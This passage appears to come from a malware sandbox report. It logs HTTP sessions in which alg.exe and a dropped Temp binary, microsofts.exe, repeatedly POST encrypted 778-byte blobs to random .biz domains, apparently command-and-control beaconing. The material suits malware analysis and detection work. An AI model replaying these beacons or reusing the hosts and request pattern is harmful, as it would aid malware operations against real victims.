                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 50015 | 54.244.188.177 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:19.787439108 CEST | 357 | OUT | POST /ucrfyypmempwn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dwrqljrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:19.787468910 CEST | 778 | OUT | Data Raw: 10 29 15 9a 65 65 f0 9e fe 02 00 00 e2 d6 5b 29 4f 03 f1 a0 ae e9 80 19 a6 29 7c ed fd 38 9c 53 04 c9 3c 93 c1 af 19 c9 39 9f 0f 13 67 f9 fd 23 da bb a9 96 3a 9e 57 8f 97 50 e8 d1 7c 9e 6d 45 f5 09 bb 25 3b 94 4e 2d 9f 93 38 44 ec d4 3d 33 38 c6
Data Ascii: )ee[)O)|8S<9g#:WP|mE%;N-8D=38<G^;V6Z.zE($r]+]@{L@xe5; ~i >*)nsi$~|Ii:YDC})t?HN2n{CO\^DV\SX)FE9la&
Oct 10, 2024 10:08:20.509427071 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=404b15a759480155566723bf67583b1a|8.46.123.33|1728547700|1728547700|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 50016 | 35.164.78.200 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:21.432128906 CEST | 352 | OUT | POST /oiwersrybt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: nqwjmb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:21.432204962 CEST | 778 | OUT | Data Raw: 16 c1 10 1d 34 a8 d5 a3 fe 02 00 00 b6 20 01 7c b7 a8 3a f8 54 b5 75 92 12 38 95 23 fa e8 09 05 04 cf c8 3c bc fa 05 81 1f 34 46 c9 69 59 e4 f3 05 b9 06 c8 ee 30 d6 fa 13 79 2b d2 29 a1 0e 15 58 41 ce cd 0e 4e 60 f3 de f1 a2 98 98 d6 11 da de cd
Data Ascii: 4 |:Tu8#<4FiY0y+)XAN`R_R''iG$sWq=vnF-,_)?dXH0gF9*aAN':z>m@n=I^_SP\<$ct`S0>~`(M|
Oct 10, 2024 10:08:22.140324116 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=141d816412929c48ed74d1984ecd9a2e|8.46.123.33|1728547702|1728547702|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 50017 | 3.94.10.34 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:22.462141991 CEST | 353 | OUT | POST /ocntklkd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ytctnunms.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:22.462160110 CEST | 778 | OUT | Data Raw: 6d 12 f4 4f e9 07 1d f9 fe 02 00 00 d8 9a a5 a4 ae b1 4c 90 5d 73 7d a0 b3 73 10 93 f3 51 08 93 0b e1 15 80 ec 2b 28 58 9a 3e 26 5c fe 3c 36 98 e9 45 6a 3f 26 e4 a4 5c e2 77 bc 86 43 84 4a d2 38 ea 90 04 9e b4 cd 17 f3 f0 36 92 b0 56 7d cd b3 79
Data Ascii: mOL]s}sQ+(X>&\<6Ej?&\wCJ86V}y1X4]+c}6,6jlXR+x--P6ztC{hMZNd(POfSo4|e7sp'['Yp(9PCi>k %>Pdh,:-/^ Lx
Oct 10, 2024 10:08:22.918196917 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a8f2ff8a69985d5add8dd6fb98378753|8.46.123.33|1728547702|1728547702|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 50018 | 82.112.184.197 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:22.473655939 CEST | 349 | OUT | POST /ndgx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:08:22.473817110 CEST | 828 | OUT | Data Raw: b3 d5 dc 33 d7 1f 1a 65 30 03 00 00 eb 4d 9f 83 2d 15 0b 0f 82 b5 05 e1 8a 4e 89 5a 0a ec e3 7a 2c 65 25 0a e1 37 63 8e b4 95 e6 dd 8b e5 1a f3 4f 09 1c ef dd cd 36 be 29 b9 db a2 c4 d6 e9 de 53 0f c0 53 44 ba 95 14 0d a9 42 81 5b 1f 38 59 24 ed
Data Ascii: 3e0M-NZz,e%7cO6)SSDB[8Y$x/p<h:.B~QKa$M'ujhb8IMiA=31Q/[Z`KPu%&Do&?xhL>V.[5ou5


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
38          192.168.2.5  50019        165.160.15.20   80                7120  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 10, 2024 10:08:23.154412031 CEST  355  OUT  POST /libobglfegsxaj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:23.154422045 CEST  778  OUT  Data Raw: (778-byte binary POST body; hex dump and its ASCII rendering omitted)
Oct 10, 2024 10:08:23.776515961 CEST  170  IN  HTTP/1.1 200 OK
Date: Thu, 10 Oct 2024 08:08:23 GMT
Content-Length: 94
Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
Oct 10, 2024 10:08:24.516083956 CEST  352  OUT  POST /dkwdmdeuhpg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:24.516129017 CEST  778  OUT  Data Raw: (778-byte binary POST body; hex dump and its ASCII rendering omitted)
Oct 10, 2024 10:08:24.693873882 CEST  95  IN  HTTP/1.1 200 OK
Date: Thu, 10 Oct 2024 08:08:24 GMT
Content-Length: 94
Connection: close
Oct 10, 2024 10:08:24.743076086 CEST  94  IN  Data Raw: (hex dump omitted; see the decoded Data Ascii line)
Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
39          192.168.2.5  50020        54.244.188.177  80                7120  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 10, 2024 10:08:25.064795971 CEST  356  OUT  POST /khpdqtysqhg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oshhkdluh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:25.064815998 CEST  778  OUT  Data Raw: (778-byte binary POST body; hex dump and its ASCII rendering omitted)
Oct 10, 2024 10:08:25.815083027 CEST  411  IN  HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=69e26f38f769d375cb01ca2f7d9c23e9|8.46.123.33|1728547705|1728547705|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
40          192.168.2.5  50021        208.100.26.245  80                7120  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 10, 2024 10:08:26.165040970 CEST  354  OUT  POST /icltfkrjatd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:26.165055037 CEST  778  OUT  Data Raw: (778-byte binary POST body; hex dump and its ASCII rendering omitted)
Oct 10, 2024 10:08:26.653096914 CEST  744  IN  HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 10 Oct 2024 08:08:26 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Oct 10, 2024 10:08:26.736372948 CEST  359  OUT  POST /xnxlkgkrmwlxblkt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:26.736397028 CEST  778  OUT  Data Raw: (778-byte binary POST body; hex dump and its ASCII rendering omitted)
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:26.855143070 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:26 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.5 | 50022 | 34.211.97.45 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:27.377311945 CEST | 352 | OUT | POST /hisgijrksnb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jpskm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:27.377329111 CEST | 778 | OUT | Data Raw: 40 d5 8c 37 32 f9 6f e1 fe 02 00 00 81 f1 18 7d 53 ed d7 61 01 49 52 bb 6d 90 f5 35 eb 54 3f eb bb 5a c8 e4 2f 13 10 c7 79 0d 3c e2 a3 23 4e e3 82 e1 54 1b fc 68 4f 09 76 5b 29 3c 8a 15 1b 16 4b 9e 06 f8 16 4e 31 3b 3a 8a 61 39 bf 96 fa 61 dc e7
Data Ascii: @72o}SaIRm5T?Z/y<#NThOv[)<KN1;:a9a"G)25 rkKGA1Ni:YO,l^?R]t`-}@]s#+mc;nb%uAv=c[kc@1Fa|\9JwJ
Oct 10, 2024 10:08:28.098156929 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=728628397f2ff4bf64ac07363f01c85e|8.46.123.33|1728547707|1728547707|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 50023 | 54.244.188.177 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:28.301605940 CEST | 346 | OUT | POST /sc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lrxdmhrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:28.301620960 CEST | 778 | OUT | Data Raw: 4b 4e 0f 9e ed b9 17 e8 fe 02 00 00 3f f4 69 13 0e b7 b2 f5 c7 e7 51 c6 fc 4c 37 83 bf 46 7b 95 49 36 26 7b 89 9f 41 21 0b b4 29 df 06 f5 e4 a7 a9 01 d3 81 d5 ab a4 64 b4 25 9a 5b 1c 27 e9 d0 81 2e 25 81 fb 9a 43 4d 37 d7 b8 44 bf 49 f1 d8 89 55
Data Ascii: KN?iQL7F{I6&{A!)d%['.%CM7DIU9ppd[d0y3IBkEV2{'^(&\{;H% f-L(uC$p[QX9wQ6"J=GP+x4dW=BOuD9$l{!7Q-Jhi>
Oct 10, 2024 10:08:29.020993948 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=494b7485581ade92f0211ef1ac0924d2|8.46.123.33|1728547708|1728547708|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 50024 | 18.141.10.107 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:29.295953035 CEST | 344 | OUT | POST /a HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wllvnzb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:29.295969963 CEST | 778 | OUT | Data Raw: 24 e5 d5 da 02 d2 b4 8b fe 02 00 00 c1 68 e1 26 27 42 d5 72 8c 31 03 a5 49 4e c7 85 b0 42 11 80 1a cf 00 71 ea f9 09 73 f4 3a 67 ce f4 3d 79 77 c2 ef b9 fd 66 2b 4b 1f 5d 67 1c 31 52 eb 2d 26 73 b9 75 47 09 71 5f e8 43 a0 1f 86 b9 75 f1 4f 35 10
Data Ascii: $h&'Br1INBqs:g=ywf+K]g1R-&suGq_CuO5O`Ajr[JFN(x==?%~czPypw0>$XRIe#tk{`y?d:z<{2R[<;t 3:n5 wk<q,!P 0*N|U4G=
Oct 10, 2024 10:08:30.655853987 CEST | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8936c7c85dae5058915b9e9ad37fe53c|8.46.123.33|1728547710|1728547710|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 50025 | 18.208.156.248 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:30.873085022 CEST | 345 | OUT | POST /skpx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gnqgo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:30.873107910 CEST | 778 | OUT | Data Raw: 90 26 11 7e 21 29 2d fe fe 02 00 00 55 15 d8 02 95 43 45 87 36 3b b4 cd 38 e7 b2 e7 50 42 3f 55 d0 a6 3b c0 84 b8 62 38 df 69 c7 68 1d bb 4f b0 c3 a7 ff a9 d5 28 50 8b 46 75 8c 05 07 a0 c1 ac 19 53 66 c6 49 70 52 c0 e0 23 d5 f4 44 63 09 cb 8a 1b
Data Ascii: &~!)-UCE6;8PB?U;b8ihO(PFuSfIpR#Dc6?x1f]mL|InO.Y1vCA$W]!u[=`3jod4\XL^fRyOqbe>rhF9Kmr"|{9xE4$@.
Oct 10, 2024 10:08:31.339724064 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:31 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=bf66fa243a2db553f6d3368b2d5fed1d|8.46.123.33|1728547711|1728547711|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 50026 | 44.221.84.105 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:31.610157013 CEST | 350 | OUT | POST /wgcbdp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jhvzpcfg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:31.610182047 CEST | 778 | OUT | Data Raw: 39 40 5c 65 62 8f 49 4d fe 02 00 00 f6 46 1e 38 8b cd 33 2d ef 80 24 00 24 5f cf 4a 72 90 02 cf 61 7c 09 8b 02 7b 85 98 c1 84 7d 35 48 5d 73 dd 1e a6 44 e4 d5 3f 0e 5c b2 bb a4 ce 42 d4 d3 a4 56 98 f2 2d 8b 21 a7 e1 c8 b6 92 2e be 16 88 6d 61 00
Data Ascii: 9@\ebIMF83-$$_Jra|{}5H]sD?\BV-!.maD->MZ[3-.>DD^NSiJ/5ADc0?*.(j2^C8L?I)5"GXZ\T!v6D)O~!u:AKq;0f#[88$
Oct 10, 2024 10:08:32.066260099 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a7ed02a123af8e1794b7e6de60b38dc0|8.46.123.33|1728547712|1728547712|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.5 | 50027 | 18.141.10.107 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:32.361505032 CEST | 360 | OUT | POST /sxrtljpowkklyfep HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: acwjcqqv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:32.361529112 CEST | 778 | OUT | Data Raw: 46 ea e4 37 ac 76 4b 22 fe 02 00 00 0d 19 12 f3 a8 0d 3e 60 15 ad 91 66 fb 39 dc db 08 bd 32 b7 5d d5 0d b5 d4 2b f5 91 84 2e ae f5 05 b2 f0 c7 6c 04 05 20 e1 3a 6d 6d a0 e1 8c 9d dc b0 02 e9 f6 44 c3 21 93 c4 6d e3 2c dc 90 98 fc d1 03 55 45 77
Data Ascii: F7vK">`f92]+.l :mmD!m,UEw9p,N6%57>h.z+oO=_[-wR$t_q|m/.wBnIo;" w.m,xwfNr6[/z.$8[6
Oct 10, 2024 10:08:33.693167925 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d63b41ee69441ed61a20dcbe2f1bdb68|8.46.123.33|1728547713|1728547713|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.5 | 50028 | 44.213.104.86 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:34.030590057 CEST | 347 | OUT | POST /ksvtsx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vyome.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:34.030608892 CEST | 778 | OUT | Data Raw: e6 d9 a0 9a 2c a5 9e b8 fe 02 00 00 62 a9 4b c3 0f 7a d1 37 b3 0f df 38 9d dd af 58 6d 5f 1c 6e d2 51 34 01 12 61 e0 ae e9 48 ca 2c 99 da 7e ea f1 88 0b df 15 6a db 94 76 9b 94 c9 c6 8b 33 9c b6 3a ed 6b c2 1c 5e 28 25 da 7d 4e e2 e0 15 32 e9 1b
Data Ascii: ,bKz78Xm_nQ4aH,~jv3:k^(%}N25Q8vANY:=x7etWCT5M"42?Nbypx/d]vt4"e<%2i.#~SlK:3[Q'/fJH{d6C@5OzH{9
Oct 10, 2024 10:08:34.491559982 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
